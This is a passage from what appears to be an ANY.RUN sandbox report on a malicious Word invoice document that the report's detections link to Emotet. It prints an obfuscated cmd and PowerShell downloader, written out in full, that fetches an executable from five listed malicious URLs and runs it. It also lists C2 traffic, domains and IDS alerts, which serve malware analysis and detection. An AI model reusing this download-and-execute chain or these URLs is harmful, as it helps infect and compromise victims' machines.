;50;37;44;42;64;72;8;50;37;42;32;2;69;14;72;37;50;44;2;71;9;31;16;67;71;41;52;70;42;46;42;70;2;45;7;72;8;8;70;42;47;71;12;71;42;32;15;27;45;71;58;1;35;20;2;64;37;50;37;50;18;25;9;18;2;64;38;49;54;38;11;65;67;45;4;65;2;52;38;24;54;38;47;19;27;43;9;59;27;58;29;3;25;59;71;20;2;64;37;50;37;50;66;18;2;69;14;72;37;50;11;32;2;31;8;8;38;49;44;42;31;54;50;7;7;42;32;0;15;18;20;20;17;71;67;13;0;67;71;41;18;2;69;14;72;37;50;11;47;59;71;9;26;67;35;18;13;26;71;18;14;49;49;49;49;11;18;65;0;9;31;27;69;71;13;0;67;71;41;18;2;69;14;72;37;50;32;2;27;54;50;14;49;44;42;27;24;7;49;54;42;32;22;45;71;58;69;32;39;39;1;58;67;1;35;65;39;39;2;52;7;72;72;54;44;42;35;24;7;54;38;42;32;81)do set Oe=!Oe!!wJ:~%J,1!&&if %J==81 echo !Oe:*Oe!=!|FOR /F "delims=RfvH0 tokens=1" %B IN ('ftype^^^|findstr cm')DO %B "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2776"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe784.exe
User:
admin
Company:
Networks Associates Technology, Inc
Integrity Level:
MEDIUM
Exit code:
0
Version:
8, 0, 0, 26
Modules
Images
c:\users\admin\appdata\local\wabmetagen\wabmetagen.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2840"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\Inv_201901_KY989632-32.doc.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
Modules
Images
c:\program files\common files\microsoft shared\office14\msoxmled.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
2928C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $d7581='b1374';$p8598=new-object Net.WebClient;$u8098='http://erdembulut.com/trEVDaG@http://baijinfen.com/6Me2lTHSrw@http://fatmanurtaskesen.com/0D5KBf4Gk@http://paksoymuhendislik.com/pddSDsBsF@http://bootaly.com/Fex5t7fe'.Split('@');$a4649='n3225';$r7322 = '784';$w161='u3261';$k4316=$env:temp+'\'+$r7322+'.exe';foreach($u1616 in $u8098){try{$p8598.DownloadFile($u1616, $k4316);$v2280='v9677';If ((Get-Item $k4316).length -ge 40000) {Invoke-Item $k4316;$o9640='o5709';break;}}catch{}}$p7339='h5798';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2996C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=RfvH0 tokens=1" %B IN ('ftype^|findstr cm') DO %B "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3240"C:\Users\admin\AppData\Local\Temp\784.exe"C:\Users\admin\AppData\Local\Temp\784.exe
784.exe
User:
admin
Company:
Networks Associates Technology, Inc
Integrity Level:
MEDIUM
Exit code:
0
Version:
8, 0, 0, 26
Modules
Images
c:\users\admin\appdata\local\temp\784.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
19 115
Read events
9 861
Write events
9 202
Delete events
52

Modification events

(PID) Process:(2840) MSOXMLED.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1312227358
(PID) Process:(2680) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:2|#
Value:
327C2300780A0000010000000000000000000000
(PID) Process:(2680) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2680) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2680) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1312227359
(PID) Process:(2680) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1312227472
(PID) Process:(2680) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1312227473
(PID) Process:(2680) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
780A000008A5395BF8B2D40100000000
(PID) Process:(2680) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:g}#
Value:
677D2300780A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2680) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:g}#
Value:
677D2300780A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
Executable files
2
Suspicious files
3
Text files
7
Unknown types
12

Dropped files

PID
Process
Filename
Type
2680WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8812.tmp.cvr
MD5:
SHA256:
2680WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\80CBBC5.jpg
MD5:
SHA256:
2640powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZA0F6RQ0AQLXBWY4HGH2.temp
MD5:
SHA256:
2680WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\query[1].asmx
MD5:
SHA256:
2680WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF424546BA4BD771D9.TMP
MD5:
SHA256:
2680WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF66D0079CF3F10749.TMP
MD5:
SHA256:
2680WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{99BD2195-9229-4C1C-95EE-93DE9A355459}.tmp
MD5:
SHA256:
2680WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C02B49F4-C1FC-458D-8779-26501D8B742B}.tmp
MD5:
SHA256:
2680WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF7B5909412A882B37.TMP
MD5:
SHA256:
2680WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{BEB13727-E187-45B4-81B7-49A20344D454}.tmp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
5
DNS requests
3
Threats
8

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3380
wabmetagen.exe
GET
200.125.113.60:8080
http://200.125.113.60:8080/
AR
malicious
2680
WINWORD.EXE
GET
200
52.109.76.6:80
http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={019C826E-445A-4649-A5B0-0BF08FCC4EEE}&build=14.0.6023
IE
xml
1.99 Kb
whitelisted
2640
powershell.exe
GET
200
94.73.146.97:80
http://erdembulut.com/trEVDaG/
TR
executable
192 Kb
malicious
2640
powershell.exe
GET
301
94.73.146.97:80
http://erdembulut.com/trEVDaG
TR
html
1.12 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2640
powershell.exe
94.73.146.97:80
erdembulut.com
Cizgi Telekomunikasyon Anonim Sirketi
TR
malicious
2680
WINWORD.EXE
52.109.76.6:80
office14client.microsoft.com
Microsoft Corporation
IE
whitelisted
2680
WINWORD.EXE
52.109.120.29:443
rr.office.microsoft.com
Microsoft Corporation
HK
whitelisted
3380
wabmetagen.exe
200.125.113.60:8080
Telecentro S.A.
AR
malicious

DNS requests

Domain
IP
Reputation
erdembulut.com
  • 94.73.146.97
malicious
office14client.microsoft.com
  • 52.109.76.6
whitelisted
rr.office.microsoft.com
  • 52.109.120.29
whitelisted

Threats

PID
Process
Class
Message
2640
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2640
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2640
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2640
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2640
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3380
wabmetagen.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3380
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Inv_201901_KY989632-32.doc